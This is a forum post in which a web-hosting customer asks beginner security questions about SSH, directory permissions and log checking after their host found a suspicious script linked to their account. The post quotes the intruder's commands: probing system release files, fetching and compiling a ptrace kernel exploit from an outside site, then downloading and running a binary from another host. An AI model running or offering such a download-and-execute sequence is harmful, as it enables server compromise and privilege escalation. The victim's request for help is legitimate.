Can SSH Be Hacked -- and other newbie questions
Recently my host found a suspect script in their /tmp directory and said my username was attached:
Code:
cd /var/tmp cat /etc/issue cat /etc/*rel* wget http://sinuspl.net/ptrace/isec-ptrace-kmod-exploit.c mv isec-ptrace-kmod-exploit.c ini.c gcc ini.c -o ini dc /var/tmp wget www.icerslair.com/n ls -al cd /var/tmp wget www.icerslair.com/n chmod 755 n ./n
1) Can SSH be hacked in this manner? Wouldn't it mean that the hacker also would have my root password?
2) How would it be possible for the person to get this, since I've never written it down anywhere?
3) If a directory is chmoded to 770, does that mean that still *anyone* can write to it, putting files in there, etc...? And if so, how can this be prevented?
4) How would I be able to tell if someone is writing scripts to my directory like this? Looking at my server logs is fun, but I don't know necessarily what I'm looking for.
I'm sure I'll think of more questions...! But answers to any of the above would greatly be appreciated.
